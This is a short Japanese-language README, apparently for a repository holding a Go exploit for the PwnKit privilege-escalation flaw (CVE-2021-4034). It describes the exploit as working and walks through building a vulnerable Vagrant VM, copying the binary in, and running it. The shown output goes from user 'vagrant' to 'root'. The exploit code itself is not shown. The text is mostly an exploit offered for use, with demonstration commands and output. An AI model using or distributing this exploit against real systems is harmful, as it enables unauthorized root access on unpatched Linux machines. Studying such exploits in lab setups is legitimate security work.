
PwnKit脆弱性(CVE-2021-4034)のエクスプロイト、Goで書かれたもの
これは、Goで書かれたpwnkit脆弱性(CVE-2021-4034)の動作するエクスプロイトです。
試してみてください:
# 脆弱なvagrantマシンを作成
$ make vm
...
# バイナリをビルドしてvagrantボックスにscpで転送
$ make scp
# vagrantボックスにsshで接続
$ make ssh
# デフォルトユーザーは "vagrant"
vagrant@ubuntu-focal:~$ whoami
vagrant
# エクスプロイトを実行
vagrant@ubuntu-focal:/tmp$ cd /tmp && ./pwnkit-go
$ whoami
root